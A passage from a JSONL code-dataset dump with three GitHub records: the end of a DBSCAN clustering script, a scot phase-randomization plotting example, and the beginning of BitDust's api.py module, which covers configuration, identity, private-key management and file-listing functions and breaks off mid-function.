algorithm='ball_tree').fit(X)\ndistances, indices = nb.kneighbors(X)\ndistances = [d[-1] for d in distances]\ndistances.sort()\n\nfig = plt.figure(figsize=(10,10))\nax = fig.add_subplot(111)\nax.scatter([i for i in range(len(distances))], distances)\nax.set_ylabel(\"KNN distance\")\nax.set_xlabel(\"points\")\nax.set_title(\"KNN plot\")\n\ndb = DBSCAN(eps=1, min_samples=4)\ny_hc = db.fit_predict(X)\nlabels = db.labels_\n\n# Number of clusters in labels, ignoring noise if present.\nn_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\nn_noise_ = list(labels).count(-1)\n\nprint('Number of clusters: %d' % n_clusters_)\nprint('Number of noise points: %d' % n_noise_)\ncluster_info(dff,y_hc)","repo_name":"plkmo/E-Commerce-UK-dataset","sub_path":"dbscan.py","file_name":"dbscan.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"36437948807","text":"from pylab import *\nfrom scot.datatools import randomize_phase\nnp.random.seed(1234)\ns = np.sin(np.linspace(0,10*np.pi,1000)).T\nx = np.vstack([s, 
np.sign(s)]).T\ny = randomize_phase(x)\nsubplot(2,1,1)\ntitle('Phase randomization of sine wave and rectangular function')\nplot(x), axis([0,1000,-3,3])\nsubplot(2,1,2)\nplot(y), axis([0,1000,-3,3])\nplt.show()","repo_name":"scot-dev/scot-doc","sub_path":"api/scot/scot-1.py","file_name":"scot-1.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"6340800356","text":"#!/usr/bin/python\r\n# api.py\r\n#\r\n# Copyright (C) 2008-2018 Veselin Penev, https://bitdust.io\r\n#\r\n# This file (api.py) is part of BitDust Software.\r\n#\r\n# BitDust is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU Affero General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# BitDust Software is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU Affero General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU Affero General Public License\r\n# along with BitDust Software. If not, see .\r\n#\r\n# Please contact us if you have any questions at bitdust.io@gmail.com\r\n#\r\n#\r\n#\r\n#\r\n\r\n\"\"\"\r\n.. module:: api.\r\n\r\nHere is a bunch of methods to interact with BitDust software.\r\n\"\"\"\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n_Debug = False\r\n_DebugLevel = 10\r\n\r\n#------------------------------------------------------------------------------\r\n\r\nimport os\r\nimport sys\r\nimport time\r\nimport json\r\n\r\nfrom twisted.internet.defer import Deferred\r\n\r\nfrom logs import lg\r\n\r\nfrom services import driver\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef on_api_result_prepared(result):\r\n # TODO\r\n return result\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef OK(result='', message=None, status='OK', extra_fields=None):\r\n o = {'status': status, }\r\n if result:\r\n o['result'] = result if isinstance(result, list) else [result, ]\r\n if message is not None:\r\n o['message'] = message\r\n if extra_fields is not None:\r\n o.update(extra_fields)\r\n o = on_api_result_prepared(o)\r\n api_method = sys._getframe().f_back.f_code.co_name\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.%s return OK(%s)' % (api_method, json.dumps(o, sort_keys=True)[:150]))\r\n return o\r\n\r\n\r\ndef RESULT(result=[], message=None, status='OK', errors=None, source=None):\r\n o = {}\r\n if source is not None:\r\n o.update(source)\r\n o.update({'status': status, 'result': result})\r\n if message is not None:\r\n o['message'] = message\r\n if errors is not None:\r\n o['errors'] = errors\r\n o = on_api_result_prepared(o)\r\n api_method = sys._getframe().f_back.f_code.co_name\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.%s return RESULT(%s)' % (api_method, json.dumps(o, sort_keys=True)[:150]))\r\n return o\r\n\r\n\r\ndef ERROR(errors=[], message=None, status='ERROR', extra_fields=None):\r\n o = {'status': status,\r\n 'errors': errors if isinstance(errors, list) else [errors, ]}\r\n if message is not None:\r\n o['message'] = message\r\n if extra_fields is not None:\r\n o.update(extra_fields)\r\n o = on_api_result_prepared(o)\r\n api_method = 
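# OK(), RESULT() and ERROR() above all build the same JSON-ready envelope:
# a dict with "status" plus optional "result"/"message"/"errors" fields,
# where scalars are wrapped into single-item lists so clients can always
# iterate. A simplified standalone mimic (without the logging and frame
# introspection) to show the shape:
def _envelope(status, result=None, message=None, errors=None):
    o = {'status': status}
    if result is not None:
        o['result'] = result if isinstance(result, list) else [result]
    if message is not None:
        o['message'] = message
    if errors is not None:
        o['errors'] = errors if isinstance(errors, list) else [errors]
    return o

assert _envelope('OK', result='stopped') == {'status': 'OK', 'result': ['stopped']}
assert _envelope('ERROR', errors='wrong key') == {'status': 'ERROR', 'errors': ['wrong key']}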
sys._getframe().f_back.f_code.co_name\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.%s return ERROR(%s)' % (api_method, json.dumps(o, sort_keys=True)[:150]))\r\n return o\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef stop():\r\n \"\"\"\r\n Stop the main process immediately.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'stopped'}\r\n \"\"\"\r\n lg.out(4, 'api.stop sending event \"stop\" to the shutdowner() machine')\r\n from twisted.internet import reactor\r\n from main import shutdowner\r\n reactor.callLater(0.1, shutdowner.A, 'stop', 'exit')\r\n # shutdowner.A('stop', 'exit')\r\n return OK('stopped')\r\n\r\n\r\ndef restart(showgui=False):\r\n \"\"\"\r\n Restart the main process, if flag show=True the GUI will be opened after\r\n restart.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'restarted'}\r\n \"\"\"\r\n from twisted.internet import reactor\r\n from main import shutdowner\r\n if showgui:\r\n lg.out(4, 'api.restart forced for GUI, added param \"show\", sending event \"stop\" to the shutdowner() machine')\r\n reactor.callLater(0.1, shutdowner.A, 'stop', 'restartnshow')\r\n # shutdowner.A('stop', 'restartnshow')\r\n return OK('restarted with GUI')\r\n lg.out(4, 'api.restart did not found bpgui process nor forced for GUI, just do the restart, sending event \"stop\" to the shutdowner() machine')\r\n # shutdowner.A('stop', 'restart')\r\n reactor.callLater(0.1, shutdowner.A, 'stop', 'restart')\r\n return OK('restarted')\r\n\r\n\r\ndef show():\r\n \"\"\"\r\n Opens a default web browser to show the BitDust GUI.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': '\"show\" event has been sent to the main process'}\r\n \"\"\"\r\n lg.out(4, 'api.show')\r\n # TODO: raise up electron window ?\r\n return OK('\"show\" event has been sent to the main process')\r\n\r\ndef health():\r\n \"\"\"\r\n Returns true if system is running \r\n\r\n Return:\r\n\r\n {'status': 'OK' }\r\n \"\"\"\r\n lg.out(4, 'api.health')\r\n\r\n return OK()\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef config_get(key):\r\n \"\"\"\r\n Returns current value for specific option from program settings.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': [{'type': 'positive integer', 'value': '8', 'key': 'logs/debug-level'}]}\r\n \"\"\"\r\n try:\r\n key = str(key).strip('/')\r\n except:\r\n return ERROR('wrong key')\r\n lg.out(4, 'api.config_get [%s]' % key)\r\n from main import config\r\n from main import config_types\r\n if key and not config.conf().exist(key):\r\n return ERROR('option \"%s\" not exist' % key)\r\n\r\n def _get_item(key):\r\n typ = config.conf().getType(key)\r\n typ_label = config.conf().getTypeLabel(key)\r\n value = None\r\n if not typ or typ in [config_types.TYPE_STRING,\r\n config_types.TYPE_TEXT,\r\n config_types.TYPE_UNDEFINED, ]:\r\n value = config.conf().getData(key)\r\n elif typ in [config_types.TYPE_BOOLEAN, ]:\r\n value = config.conf().getBool(key)\r\n elif typ in [config_types.TYPE_INTEGER,\r\n config_types.TYPE_POSITIVE_INTEGER,\r\n config_types.TYPE_NON_ZERO_POSITIVE_INTEGER, ]:\r\n value = config.conf().getInt(key)\r\n elif typ in [config_types.TYPE_FOLDER_PATH,\r\n config_types.TYPE_FILE_PATH,\r\n config_types.TYPE_COMBO_BOX,\r\n config_types.TYPE_PASSWORD, ]:\r\n value = config.conf().getString(key)\r\n else:\r\n value = config.conf().getData(key)\r\n return {\r\n 'key': key,\r\n 'value': value,\r\n 'type': typ_label,\r\n }\r\n\r\n if key and not config.conf().hasChilds(key):\r\n 
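# The if/elif ladder inside _get_item() above dispatches on the option type.
# An equivalent table-driven sketch, using only the config/config_types names
# already imported above (illustrative, not part of the original module):
from main import config
from main import config_types

_GETTER_BY_TYPE = {
    config_types.TYPE_BOOLEAN: lambda k: config.conf().getBool(k),
    config_types.TYPE_INTEGER: lambda k: config.conf().getInt(k),
    config_types.TYPE_POSITIVE_INTEGER: lambda k: config.conf().getInt(k),
    config_types.TYPE_NON_ZERO_POSITIVE_INTEGER: lambda k: config.conf().getInt(k),
    config_types.TYPE_FOLDER_PATH: lambda k: config.conf().getString(k),
    config_types.TYPE_FILE_PATH: lambda k: config.conf().getString(k),
    config_types.TYPE_COMBO_BOX: lambda k: config.conf().getString(k),
    config_types.TYPE_PASSWORD: lambda k: config.conf().getString(k),
}

def read_config_value(key):
    typ = config.conf().getType(key)
    # strings, text and undefined types all fall back to getData()
    getter = _GETTER_BY_TYPE.get(typ, lambda k: config.conf().getData(k))
    return getter(key)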
return RESULT([_get_item(key), ], )\r\n    childs = []\r\n    for child in config.conf().listEntries(key):\r\n        if config.conf().hasChilds(child):\r\n            childs.append({\r\n                'key': child,\r\n                'childs': len(config.conf().listEntries(child)),\r\n            })\r\n        else:\r\n            childs.append(_get_item(child))\r\n    return RESULT(childs)\r\n\r\n\r\ndef config_set(key, value):\r\n    \"\"\"\r\n    Set a value for given option.\r\n\r\n    Return:\r\n\r\n        {'status': 'OK', 'result': [{'type': 'positive integer', 'old_value': '8', 'value': '10', 'key': 'logs/debug-level'}]}\r\n    \"\"\"\r\n    key = str(key)\r\n    from main import config\r\n    from main import config_types\r\n    v = {}\r\n    if config.conf().exist(key):\r\n        v['old_value'] = config.conf().getData(key)\r\n    typ = config.conf().getType(key)\r\n    typ_label = config.conf().getTypeLabel(key)\r\n    lg.out(4, 'api.config_set [%s]=%s type is %s' % (key, value, typ_label))\r\n    if not typ or typ in [config_types.TYPE_STRING,\r\n                          config_types.TYPE_TEXT,\r\n                          config_types.TYPE_UNDEFINED, ]:\r\n        config.conf().setData(key, unicode(value))\r\n    elif typ in [config_types.TYPE_BOOLEAN, ]:\r\n        if (isinstance(value, str) or isinstance(value, unicode)):\r\n            vl = value.strip().lower() == 'true'\r\n        else:\r\n            vl = bool(value)\r\n        config.conf().setBool(key, vl)\r\n    elif typ in [config_types.TYPE_INTEGER,\r\n                 config_types.TYPE_POSITIVE_INTEGER,\r\n                 config_types.TYPE_NON_ZERO_POSITIVE_INTEGER, ]:\r\n        config.conf().setInt(key, int(value))\r\n    elif typ in [config_types.TYPE_FOLDER_PATH,\r\n                 config_types.TYPE_FILE_PATH,\r\n                 config_types.TYPE_COMBO_BOX,\r\n                 config_types.TYPE_PASSWORD, ]:\r\n        config.conf().setString(key, value)\r\n    else:\r\n        config.conf().setData(key, unicode(value))\r\n    v.update({'key': key,\r\n              'value': config.conf().getData(key),\r\n              'type': config.conf().getTypeLabel(key)\r\n              # 'code': config.conf().getType(key),\r\n              # 'label': config.conf().getLabel(key),\r\n              # 'info': config.conf().getInfo(key),\r\n              })\r\n    return RESULT([v, ])\r\n\r\n\r\ndef config_list(sort=False):\r\n    \"\"\"\r\n    Provide detailed info about all options and values from settings.\r\n\r\n    Return:\r\n\r\n        {'status': 'OK',\r\n         'result': [{\r\n            'type': 'boolean',\r\n            'value': 'true',\r\n            'key': 'services/backups/enabled'\r\n         }, {\r\n            'type': 'boolean',\r\n            'value': 'false',\r\n            'key': 'services/backups/keep-local-copies-enabled'\r\n         }, {\r\n            'type': 'diskspace',\r\n            'value': '128 MB',\r\n            'key': 'services/backups/max-block-size'\r\n        }]}\r\n    \"\"\"\r\n    lg.out(4, 'api.config_list')\r\n    from main import config\r\n    r = config.conf().cache()\r\n    r = map(lambda key: {\r\n        'key': key,\r\n        'value': str(r[key]).replace('\\n', '\\\\n'),\r\n        'type': config.conf().getTypeLabel(key)}, r.keys())\r\n    if sort:\r\n        r = sorted(r, key=lambda i: i['key'])\r\n    return RESULT(r)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef identity_get(include_xml_source=False):\r\n    \"\"\"\r\n    Returns your current identity from the local settings.\r\n    \"\"\"\r\n    from userid import my_id\r\n    if not my_id.isLocalIdentityReady():\r\n        return ERROR('local identity is not valid or does not exist')\r\n    r = my_id.getLocalIdentity().serialize_json()\r\n    if include_xml_source:\r\n        r['xml'] = my_id.getLocalIdentity().serialize()\r\n    return RESULT([r, ])\r\n\r\ndef identity_create(username):\r\n    from lib import misc\r\n    from userid import my_id\r\n    from userid import id_registrator\r\n\r\n    try:\r\n        username = str(username)\r\n    except:\r\n        return ERROR('invalid user name')\r\n    if not misc.ValidUserName(username):\r\n        return ERROR('invalid user name')\r\n\r\n    ret = Deferred()\r\n    
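# Several api.* methods (identity_create here, key_share and file_upload_start
# further down) return a twisted Deferred instead of a plain dict, because
# they wait on a state machine. A caller-side sketch that normalizes both
# shapes, so every api.* call can be consumed the same way (the helper name
# is made up):
from twisted.internet.defer import Deferred, succeed

def call_api(method, *args, **kwargs):
    result = method(*args, **kwargs)
    return result if isinstance(result, Deferred) else succeed(result)

# usage (hypothetical):
#   call_api(identity_create, 'alice').addCallback(
#       lambda resp: print(resp['status']))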
my_id_registrator = id_registrator.A()\r\n\r\n def _id_registrator_state_changed(oldstate, newstate, event_string, args):\r\n if newstate == 'FAILED':\r\n ret.callback(ERROR(my_id_registrator.last_message))\r\n return\r\n if newstate == 'DONE':\r\n my_id.loadLocalIdentity()\r\n if not my_id.isLocalIdentityReady():\r\n return ERROR('identity creation FAILED')\r\n r = my_id.getLocalIdentity().serialize_json()\r\n r['xml'] = my_id.getLocalIdentity().serialize()\r\n ret.callback(RESULT([r, ]))\r\n return\r\n\r\n my_id_registrator.addStateChangedCallback(_id_registrator_state_changed)\r\n my_id_registrator.A('start', (username, ))\r\n return ret\r\n\r\ndef identity_recover(private_key_source, known_idurl=None):\r\n from lib import nameurl\r\n from userid import my_id\r\n from userid import id_restorer\r\n\r\n if not private_key_source:\r\n return ERROR('must provide private key in order to recover your identity')\r\n if len(private_key_source) > 1024 * 10:\r\n return ERROR('private key is too large')\r\n\r\n idurl = ''\r\n pk_source = ''\r\n try:\r\n lines = private_key_source.split('\\n')\r\n idurl = lines[0]\r\n pk_source = '\\n'.join(lines[1:])\r\n if idurl != nameurl.FilenameUrl(nameurl.UrlFilename(idurl)):\r\n idurl = ''\r\n pk_source = private_key_source\r\n except:\r\n idurl = ''\r\n pk_source = private_key_source\r\n if not idurl and known_idurl:\r\n idurl = known_idurl\r\n if not idurl:\r\n return ERROR('you must specify the global IDURL address where your identity file was last located')\r\n\r\n ret = Deferred()\r\n my_id_restorer = id_restorer.A()\r\n\r\n def _id_restorer_state_changed(oldstate, newstate, event_string, args):\r\n if newstate == 'FAILED':\r\n ret.callback(ERROR(my_id_restorer.last_message))\r\n return\r\n if newstate == 'RESTORED!':\r\n my_id.loadLocalIdentity()\r\n if not my_id.isLocalIdentityReady():\r\n return ERROR('identity recovery FAILED')\r\n r = my_id.getLocalIdentity().serialize_json()\r\n r['xml'] = my_id.getLocalIdentity().serialize()\r\n ret.callback(RESULT([r, ]))\r\n return\r\n\r\n my_id_restorer.addStateChangedCallback(_id_restorer_state_changed)\r\n my_id_restorer.A('start', {'idurl': idurl, 'keysrc': pk_source, })\r\n return ret\r\n\r\ndef identity_list():\r\n \"\"\"\r\n \"\"\"\r\n from contacts import identitycache\r\n results = []\r\n for id_obj in identitycache.Items().values():\r\n r = id_obj.serialize_json()\r\n results.append(r)\r\n results.sort(key=lambda r: r['name'])\r\n return RESULT(results)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef key_get(key_id, include_private=False):\r\n \"\"\"\r\n Returns details of known private key.\r\n Use `include_private=True` to get Private Key as openssh formated string.\r\n\r\n Return:\r\n\r\n {'status': 'OK'.\r\n 'result': [{\r\n 'alias': 'cool',\r\n 'creator': 'http://p2p-id.ru/testveselin.xml',\r\n 'key_id': 'cool$testveselin@p2p-id.ru',\r\n 'fingerprint': '50:f9:f1:6d:e3:e4:25:61:0c:81:6f:79:24:4e:78:17',\r\n 'size': '4096',\r\n 'ssh_type': 'ssh-rsa',\r\n 'type': 'RSA',\r\n 'public': 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCPy7AXI0HuQSdmMF...',\r\n 'private': '-----BEGIN RSA PRIVATE KEY-----\\nMIIJKAIBAAKCAgEAj8uw...'\r\n }]}\r\n \"\"\"\r\n lg.out(4, 'api.key_get')\r\n from crypt import my_keys\r\n try:\r\n r = my_keys.get_key_info(key_id=key_id, include_private=include_private)\r\n except Exception as exc:\r\n return ERROR(str(exc))\r\n return RESULT([r, ])\r\n\r\n\r\ndef keys_list(sort=False, include_private=False):\r\n \"\"\"\r\n List details for 
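# identity_recover() above accepts a combined "private key source" whose first
# line may be the IDURL, with the key body underneath. A standalone sketch of
# that split -- the real code validates the first line with a nameurl
# round-trip, here approximated by a URL-prefix check:
def split_key_source(private_key_source):
    lines = private_key_source.split('\n')
    first = lines[0].strip()
    if first.startswith('http://') or first.startswith('https://'):
        return first, '\n'.join(lines[1:])
    return '', private_key_source

idurl, pk = split_key_source(
    'http://p2p-id.ru/alice.xml\n-----BEGIN RSA PRIVATE KEY-----\n...')
print(idurl)  # http://p2p-id.ru/alice.xml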
known Private Keys.\r\n    Use `include_private=True` to get Private Keys as openssh formatted strings.\r\n\r\n    Return:\r\n        {'status': 'OK',\r\n         'result': [{\r\n             'alias': 'master',\r\n             'key_id': 'master$veselin@p2p-id.ru',\r\n             'creator': 'http://p2p-id.ru/veselin.xml',\r\n             'fingerprint': '60:ce:ea:98:bf:3d:aa:ba:29:1e:b9:0c:3e:5c:3e:32',\r\n             'size': '2048',\r\n             'ssh_type': 'ssh-rsa',\r\n             'type': 'RSA',\r\n             'public': 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbpo3VYR5zvLe5...'\r\n             'private': '-----BEGIN RSA PRIVATE KEY-----\\nMIIJKAIBAAKCAgEAj8uw...'\r\n         }, {\r\n             'alias': 'another_key01',\r\n             'key_id': 'another_key01$veselin@p2p-id.ru',\r\n             'creator': 'http://p2p-id.ru/veselin.xml',\r\n             'fingerprint': '43:c8:3b:b6:da:3e:8a:3c:48:6f:92:bb:74:b4:05:6b',\r\n             'size': '4096',\r\n             'ssh_type': 'ssh-rsa',\r\n             'type': 'RSA',\r\n             'public': 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCmgX6j2MwEyY...'\r\n             'private': '-----BEGIN RSA PRIVATE KEY-----\\nMIIJKsdAIBSjfAdfguw...'\r\n         }]}\r\n    \"\"\"\r\n    lg.out(4, 'api.keys_list')\r\n    from crypt import my_keys\r\n    r = []\r\n    for key_id, key_object in my_keys.known_keys().items():\r\n        key_alias, creator_idurl = my_keys.split_key_id(key_id)\r\n        if not key_alias or not creator_idurl:\r\n            lg.warn('incorrect key_id: %s' % key_id)\r\n            continue\r\n        try:\r\n            key_info = my_keys.make_key_info(key_object, key_id=key_id, include_private=include_private)\r\n        except:\r\n            key_info = my_keys.make_key_info(key_object, key_id=key_id, include_private=False)\r\n        r.append(key_info)\r\n    if sort:\r\n        r = sorted(r, key=lambda i: i['alias'])\r\n    r.insert(0, my_keys.make_master_key_info(include_private=include_private))\r\n    return RESULT(r)\r\n\r\n\r\ndef key_create(key_alias, key_size=2048, include_private=False):\r\n    \"\"\"\r\n    Generate new Private Key and add it to the list of known keys under a `key_id` built from the given `key_alias`.\r\n\r\n    Return:\r\n\r\n    {'status': 'OK',\r\n     'message': 'new private key \"abcd\" was generated successfully',\r\n     'result': [{\r\n        'alias': 'abcd',\r\n        'id': 'abcd$veselin@p2p-id.ru',\r\n        'creator': 'http://p2p-id.ru/veselin.xml',\r\n        'fingerprint': 'bb:16:97:65:59:23:c2:5d:62:9d:ce:7d:36:73:c6:1f',\r\n        'size': '4096',\r\n        'ssh_type': 'ssh-rsa',\r\n        'type': 'RSA',\r\n        'public': 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC8w2MhOPR/IoQ...'\r\n        'private': '-----BEGIN RSA PRIVATE KEY-----\\nMIIJKsdAIBSjfAdfguw...'\r\n     }]}\r\n    \"\"\"\r\n    from crypt import my_keys\r\n    from userid import my_id\r\n    key_alias = str(key_alias)\r\n    key_alias = key_alias.strip().lower()\r\n    key_id = my_keys.make_key_id(key_alias, creator_idurl=my_id.getLocalID())\r\n    if not my_keys.is_valid_key_id(key_id):\r\n        return ERROR('key \"%s\" is not valid' % key_id)\r\n    if my_keys.is_key_registered(key_id):\r\n        return ERROR('key \"%s\" already exists' % key_id)\r\n    lg.out(4, 'api.key_create id=%s, size=%s' % (key_id, key_size))\r\n    key_object = my_keys.generate_key(key_id, key_size=key_size)\r\n    if key_object is None:\r\n        return ERROR('failed to generate private key \"%s\"' % key_id)\r\n    return OK(my_keys.make_key_info(\r\n        key_object,\r\n        key_id=key_id,\r\n        include_private=include_private\r\n    ), message='new private key \"%s\" was generated successfully' % key_alias, )\r\n\r\n\r\ndef key_erase(key_id):\r\n    \"\"\"\r\n    Removes Private Key from the list of known keys and erases the local key file.\r\n\r\n    Return:\r\n\r\n    {'status': 'OK',\r\n     'message': 'private key \"ccc2\" was erased successfully',\r\n    }\r\n    \"\"\"\r\n    from crypt import my_keys\r\n    key_id = str(key_id)\r\n    lg.out(4, 'api.key_erase')\r\n    if key_id == 'master':\r\n        return 
ERROR('\"master\" key can not be removed')\r\n key_alias, creator_idurl = my_keys.split_key_id(key_id)\r\n if not key_alias or not creator_idurl:\r\n return ERROR('icorrect key_id format')\r\n if not my_keys.erase_key(key_id):\r\n return ERROR('failed to erase private key \"%s\"' % key_alias)\r\n return OK(message='private key \"%s\" was erased successfully' % key_alias)\r\n\r\n\r\ndef key_share(key_id, trusted_global_id_or_idurl, include_private=False, timeout=10):\r\n \"\"\"\r\n Connects to remote node and transfer private key to that machine.\r\n This way remote user will be able to access those of your files which were encrypted with that private key.\r\n You can also share a public key, this way your supplier will know which data packets can be accessed by\r\n another customer.\r\n\r\n Returns:\r\n\r\n \"\"\"\r\n from userid import global_id\r\n try:\r\n trusted_global_id_or_idurl = str(trusted_global_id_or_idurl)\r\n full_key_id = str(key_id)\r\n except:\r\n return ERROR('error reading input parameters')\r\n if not driver.is_on('service_keys_registry'):\r\n return ERROR('service_keys_registry() is not started')\r\n glob_id = global_id.ParseGlobalID(full_key_id)\r\n if glob_id['key_alias'] == 'master':\r\n return ERROR('\"master\" key can not be shared')\r\n if not glob_id['key_alias'] or not glob_id['idurl']:\r\n return ERROR('icorrect key_id format')\r\n idurl = trusted_global_id_or_idurl\r\n if global_id.IsValidGlobalUser(idurl):\r\n idurl = global_id.GlobalUserToIDURL(idurl)\r\n from access import key_ring\r\n ret = Deferred()\r\n d = key_ring.share_key(key_id=full_key_id, trusted_idurl=idurl, include_private=include_private, timeout=timeout)\r\n d.addCallback(\r\n lambda resp: ret.callback(\r\n OK(str(resp))))\r\n d.addErrback(\r\n lambda err: ret.callback(\r\n ERROR(err.getErrorMessage())))\r\n return ret\r\n\r\n\r\ndef key_audit(key_id, untrusted_global_id_or_idurl, is_private=False, timeout=10):\r\n \"\"\"\r\n Connects to remote node identified by `idurl` parameter and request audit\r\n of a public or private key `key_id` on that machine.\r\n Returns True in the callback if audit process succeed - that means remote user\r\n posses that public or private key.\r\n\r\n Returns:\r\n \"\"\"\r\n from userid import global_id\r\n try:\r\n untrusted_global_id_or_idurl = str(untrusted_global_id_or_idurl)\r\n full_key_id = str(key_id)\r\n except:\r\n return ERROR('error reading input parameters')\r\n if not driver.is_on('service_keys_registry'):\r\n return ERROR('service_keys_registry() is not started')\r\n glob_id = global_id.ParseGlobalID(full_key_id)\r\n if not glob_id['key_alias'] or not glob_id['idurl']:\r\n return ERROR('icorrect key_id format')\r\n if global_id.IsValidGlobalUser(untrusted_global_id_or_idurl):\r\n idurl = global_id.GlobalUserToIDURL(untrusted_global_id_or_idurl)\r\n else:\r\n idurl = untrusted_global_id_or_idurl\r\n from access import key_ring\r\n ret = Deferred()\r\n if is_private:\r\n d = key_ring.audit_private_key(key_id=key_id, untrusted_idurl=idurl, timeout=timeout)\r\n else:\r\n d = key_ring.audit_public_key(key_id=key_id, untrusted_idurl=idurl, timeout=timeout)\r\n d.addCallback(\r\n lambda resp: ret.callback(\r\n OK(str(resp))))\r\n d.addErrback(\r\n lambda err: ret.callback(\r\n ERROR(err.getErrorMessage())))\r\n return ret\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef filemanager(json_request):\r\n \"\"\"\r\n A service method to execute calls from GUI front-end and interact with web\r\n browser. 
This is a special \"gates\" created only for Ajax calls from GUI. It\r\n provides same methods as other functions here, but just in a different way.\r\n\r\n Request:\r\n {\"params\":{\"mode\":\"stats\"}}\r\n\r\n Response:\r\n {'bytes_donated': 8589934592,\r\n 'bytes_indexed': 43349475,\r\n 'bytes_needed': 104857600,\r\n 'bytes_used_supplier': 21738768,\r\n 'bytes_used_total': 86955072,\r\n 'customers': 0,\r\n 'files_count': 5,\r\n 'folders_count': 0,\r\n 'items_count': 15,\r\n 'max_suppliers': 4,\r\n 'online_suppliers': 0,\r\n 'suppliers': 4,\r\n 'timestamp': 1458669668.288339,\r\n 'value_donated': '8 GB',\r\n 'value_needed': '100 MB',\r\n 'value_used_total': '82.93 MB'}\r\n\r\n You can also access those methods with another API \"alias\": `filemanager_{ mode }({ extra params })`\r\n\r\n WARNING: Those methods here will be deprecated and removed, use regular API methods instead.\r\n \"\"\"\r\n if not driver.is_on('service_restores'):\r\n return ERROR('service_restores() is not started')\r\n from storage import filemanager_api\r\n return filemanager_api.process(json_request)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef files_sync():\r\n \"\"\"\r\n Sends \"restart\" event to backup_monitor() Automat, this should start \"data\r\n synchronization\" process with remote nodes. Normally all situations\r\n should be handled automatically so you wont run this method manually,\r\n but just in case.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'the main files sync loop has been restarted'}\r\n \"\"\"\r\n if not driver.is_on('service_backups'):\r\n return ERROR('service_backups() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.files_sync')\r\n from storage import backup_monitor\r\n backup_monitor.A('restart')\r\n lg.out(4, 'api.files_sync')\r\n return OK('the main files sync loop has been restarted')\r\n\r\n\r\ndef files_list(remote_path=None, key_id=None, recursive=True, all_customers=False):\r\n \"\"\"\r\n Returns list of known files registered in the catalog under given `remote_path` folder.\r\n By default returns items from root of the catalog.\r\n If `key_id` is passed will only return items encrypted using that key.\r\n\r\n Return:\r\n { u'execution': u'0.001040',\r\n u'result': [\r\n { u'childs': False,\r\n u'customer': u'veselin@veselin-p2p.ru',\r\n u'remote_path': u'master$veselin@veselin-p2p.ru:cats.png',\r\n u'global_id': u'master$veselin@veselin-p2p.ru:1',\r\n u'idurl': u'http://veselin-p2p.ru/veselin.xml',\r\n u'key_id': u'master$veselin@veselin-p2p.ru',\r\n u'latest': u'',\r\n u'local_size': -1,\r\n u'name': u'cats.png',\r\n u'path': u'cats.png',\r\n u'path_id': u'1',\r\n u'size': 0,\r\n u'type': u'file',\r\n u'versions': []},\r\n { u'childs': False,\r\n u'customer': u'veselin@veselin-p2p.ru',\r\n u'remote_path': u'master$veselin@veselin-p2p.ru:dogs.jpg',\r\n u'global_id': u'master$veselin@veselin-p2p.ru:2',\r\n u'idurl': u'http://veselin-p2p.ru/veselin.xml',\r\n u'key_id': u'master$veselin@veselin-p2p.ru',\r\n u'latest': u'',\r\n u'local_size': 345418,\r\n u'name': u'dogs.jpg',\r\n u'path': u'dogs.jpg',\r\n u'path_id': u'2',\r\n u'size': 0,\r\n u'type': u'file',\r\n u'versions': []},\r\n ],\r\n u'status': u'OK'}\r\n \"\"\"\r\n if not driver.is_on('service_backups'):\r\n return ERROR('service_backups() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.files_list remote_path=%s key_id=%s recursive=%s all_customers=%s' % (\r\n remote_path, key_id, recursive, all_customers))\r\n from storage import 
backup_fs\r\n from system import bpio\r\n from userid import global_id\r\n from crypt import my_keys\r\n result = []\r\n glob_path = global_id.ParseGlobalID(remote_path)\r\n norm_path = global_id.NormalizeGlobalID(glob_path.copy())\r\n remotePath = bpio.remotePath(norm_path['path'])\r\n customer_idurl = norm_path['idurl']\r\n if not all_customers and customer_idurl not in backup_fs.known_customers():\r\n return ERROR('customer \"%s\" not found' % customer_idurl)\r\n if all_customers:\r\n lookup = []\r\n for customer_idurl in backup_fs.known_customers():\r\n look = backup_fs.ListChildsByPath(\r\n path=remotePath,\r\n recursive=recursive,\r\n iter=backup_fs.fs(customer_idurl),\r\n iterID=backup_fs.fsID(customer_idurl),\r\n )\r\n if isinstance(look, list):\r\n lookup.extend(look)\r\n else:\r\n lg.warn(look)\r\n else:\r\n lookup = backup_fs.ListChildsByPath(\r\n path=remotePath,\r\n recursive=recursive,\r\n iter=backup_fs.fs(customer_idurl),\r\n iterID=backup_fs.fsID(customer_idurl),\r\n )\r\n if not isinstance(lookup, 